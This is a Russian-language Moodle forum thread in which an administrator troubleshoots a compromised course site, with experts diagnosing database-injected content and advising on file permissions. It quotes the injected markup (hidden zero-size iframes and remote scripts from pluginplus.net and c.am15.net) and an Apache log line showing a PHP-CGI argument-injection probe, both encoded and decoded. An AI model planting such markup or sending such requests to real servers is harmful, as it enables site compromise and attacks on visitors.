Проблемы с Мудлом 2.6

Проблемы с Мудлом 2.6

by Андрій Кісіль -
Number of replies: 10

Добрый день.

Есть система Мудл с последнимы обновлениями. Даний ресурс крутитса на серваке и имеет выход в интернет по реальному айпи, доменого имени пока нету.

Создал я в системе курсы. Но вот с недавних пор заметил, что когда пробую редактировать курсы, то страница с редактированием не догружаетса до конца. Что это значит.? Просто на вкладке в мозиле кружочек загрузки показывает загрузку. А Мозила показивает что идёт соединение с www.webalyzer.com.ua. А также бывает что при переходе по ссылкам в курсе может появитса новое окно из загрузкой страницы реестрции на WarThunder.ru‎.

Что это такое. Может я что то неправильно настроил. Мне кажытса что это появилось после перехода с 2.5 на 2.6.

Ещё вот скрин.скрин

Sum of ratings: -
In reply to Андрій Кісіль

Re: Проблемы с Мудлом 2.6

by Андрій Кісіль -

Вот тут ещё полазил по системе и выяснил что это происходит тока на 2 курсах. Ещё заметил что на этих курсах обращение на внешние ресурсы с4.gostats.ru, mc.yandex.ru.

Что это такое и как это решыть. Не догружение страницы на этих курсах не даёт возможности редактировать нормально курс, проходить тесты.

Sum of ratings: -
In reply to Андрій Кісіль

Re: Проблемы с Мудлом 2.6

by Vadim Tabunshchik -
Picture of Developers

Это не с Мудлом проблемы, а "кривые ручки" вставляют контент в ресурсы, в частности, в описание курса "Мови програмування".

Посмотрите исходный текст этого описания, там вообще какой-то "левый" фрейм вставили:

<div class="no-overflow"><p>Даний курс розроблено для студентів коледжу.</p><p>Автор курсу - Рац В.О. <iframe src="https://pluginplus.net/statistica/statistic_li.html" style="width: 0px; height: 0px; border: 0px none;"></iframe></p><script src="http://c.am15.net/preloader7.js" type="text/javascript"></script><div id="advm_video"></div><div><div id="advm_block" style="display: none;"><div style="color: #ffffff; float: right; cursor: pointer; display: none; padding-right: 5px; margin-top: 2px; font-size: 12px;" id="advm_close">Закрыть [Х]</div><div id="ambn17757"></div><div style="color: #ffffff; position: absolute; right: 10px; top: 2px; text-align: right; width: 300px; font-size: 13px;" id="advm_box"><div>Осталось <span id="advm_timer"></span> сек.</div></div></div></div><script src="https://pluginplus.net/plugins/system/system_im.js" type="text/javascript"></script><p><iframe src="https://pluginplus.net/statistica/statistic_li.html" style="width: 0px; height: 0px; border: 0px none;"></iframe></p><script src="http://c.am15.net/preloader7.js" type="text/javascript"></script>

Почистите этот мусор и страница будет нормально загружаться. Наверняка и в курсах такое же есть. Научите всех пользоваться кнопками редактора "Вставить как простой текст" и "Вставить из Word", а то будете постоянно иметь такие проблемы.

 

Sum of ratings: 2 (1)
In reply to Vadim Tabunshchik

Re: Проблемы с Мудлом 2.6

by Андрій Кісіль -

Вадим спасибо за подсказку. Вы правы эти фреймы появились во всех описаныях разных деятельностей на курсе. Но вот парадокс. Все эти описания делал я и я их не копировал, а набирал с клавиатуры. Значит это как то ломанули мой сервак. Это у меня руки кривые.

Скажыте а как вы увидели этот фрейм.? Поделитесь.

Щас сижу и смотрю не взломали сервак на котором развёрнут Мудл.

Sum of ratings: -
In reply to Андрій Кісіль

Re: Проблемы с Мудлом 2.6

by Vadim Tabunshchik -
Picture of Developers

Скажыте а как вы увидели этот фрейм.? Поделитесь.

Посмотрел исходный код страницы, фрагмент этого кода я выложил в сообщении выше.

Скорее всего, ломанули БД

Sum of ratings: 2 (1)
In reply to Vadim Tabunshchik

Re: Проблемы с Мудлом 2.6

by Андрій Кісіль -

Да как то ломанули БД. Вот как интересно. Весь этот мусор был в базе. Я уже почистил. Поменял пароль на root, на root пользователя Mysql, и поменял пароль на пользователя под которым Мудл цепляетса к базе.

Возможно было так. Смогли вытянуть config.php сайта. Я когда обновлял сайт забыл  права поправить. Владельцем и групой были root:root а права были  rw-r--r--. Тоисть и остальные тоже могли читать.

Как правильно должно быть.

 

Sum of ratings: -
In reply to Андрій Кісіль

Re: Проблемы с Мудлом 2.6

by Vadim Tabunshchik -
Picture of Developers

В moodle посмотрите отчет о безопасности: Администрирование ► Отчеты ► Сведения о безопасности

Как правильно должно быть.

http://docs.moodle.org/26/en/report/security/report_security_check_configrw

Владельцем и групой были root:root

А зачем? Владельцем должен быть пользователь, от имени кот. запускается веб-сервер.

Sum of ratings: -
In reply to Vadim Tabunshchik

Re: Проблемы с Мудлом 2.6

by Виталий Лавров -
Picture of Эксперт по Moodle

Нельзя делать владельцем  файлов и каталогов moodle uid от которой запущен веб-сервер/php! Это прямой путь к заражению сервера.

Самое безопасное сделать владельцем всех файлов/каталогов root, а группу взять от апача. Права для файлов 0640, для каталогов 0750.

Попытайтесь определить способ заражения, иначе снова взломают (если это не банальная утечка пароля).

Sum of ratings: -
In reply to Виталий Лавров

Re: Проблемы с Мудлом 2.6

by Андрій Кісіль -

Я как раз так и сделал. Владелец файла root а група apache. Права выставил 0640.

А вот как выяснить через что ломанули не представляю.

Просмотрел системные конфиги, пройшёлся rkhunterom, ничего подозрительного. Тока в логах апача вот что было

77.79.214.207 - - [17/Dec/2013:03:00:11 +0200] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 209

Преобразуетса в

77.79.214.207 - - [17/Dec/2013:03:00:11 +0200] "POST /cgi-bin/php -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

Вот не пойму как смогли к базе добратса.

Sum of ratings: -
In reply to Андрій Кісіль

Re: Проблемы с Мудлом 2.6

by Виталий Лавров -
Picture of Эксперт по Moodle

оно сказало в ответ 404 - нет такого файла, так что это только была  проверка уязвимости.

Админа сервера нужно трясти на тему протухших версий софта и доступных сервисов. Может уже что-то подменено в системе...

 

Sum of ratings: 2 (1)
In reply to Виталий Лавров

Re: Проблемы с Мудлом 2.6

by Андрій Кісіль -

Хэх. Админ я. Я толька учусь. Фаервол закрывает сервак снаружы. Открыты тока 80 и 1194 порты. Больше портов открыто из локалки.

Нащёт подменено не знаю проверял rkhunterom. И просматривал директорию /etc на наличие изменнёных файлов.

Sum of ratings: -